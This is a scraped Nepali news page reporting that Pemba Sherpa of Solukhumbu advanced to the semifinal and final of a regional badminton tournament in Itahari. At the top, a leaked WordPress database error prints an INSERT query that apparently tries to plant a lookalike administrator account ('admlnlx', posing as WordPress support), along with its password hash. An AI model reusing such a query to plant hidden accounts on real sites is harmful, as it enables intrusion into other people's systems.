WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYgmCnI3IiQLK7HUYTjQFFjln04ZxS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:45:27', '', 'admlnlx', 'admlnlx')

आठौ क्षत्रीय ब्याडमिन्टन प्रतियोगिता २०७५ को प्रतिनिधित्व गर्दै सोलुखुम्बुको पेम्बा शेर्पा फाईनलमा – Gaule Khabar

आठौ क्षत्रीय ब्याडमिन्टन प्रतियोगिता २०७५ को प्रतिनिधित्व गर्दै सोलुखुम्बुको पेम्बा शेर्पा फाईनलमा

आठौ क्षत्रीय ब्याडमिन्टन प्रतियोगिता २०७५ को प्रतिनिधित्व गर्दै सोलुखुम्बुको पेम्बा शेर्पा फाईनलमा

गाँउले न्यूज–११ फाल्गुण,काठमान्डौ, सोलुखुम्बुको प्रतिनिधित्व गर्दै पेम्बा शेर्पाले इटहरीमा जारी क्षत्रीय ब्याडमिन्टन प्रतियोगिताको सेमीफाईनलमा प्रबेश गरेका छन्।

“स्वास्थ्यको लागि खेल्कुद, राष्ट्रको लागि खेल्कुद” भन्ने नाराको साथ पूर्वाञ्चल खेलकुद बिकास समितिले आयोजना गरेको हो । इटहरीमा जारी १ नं प्रदेश स्तरिय आठौ क्षत्रीय ब्याडमिन्टन प्रतियोगिता २०७५ को फाल्गुन ८ मा उद्घाटन गरिएको हो ।

उक्त जारी प्रतियोगितामा सोलुखुम्बु जिल्लाको प्रतिनिधित्व गर्दै शेर्पाले फाईनलको यात्रा तय सगै सेमि फाईनलको यात्रामा सान्दार जितका साथ प्रवेश गरेका हुन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका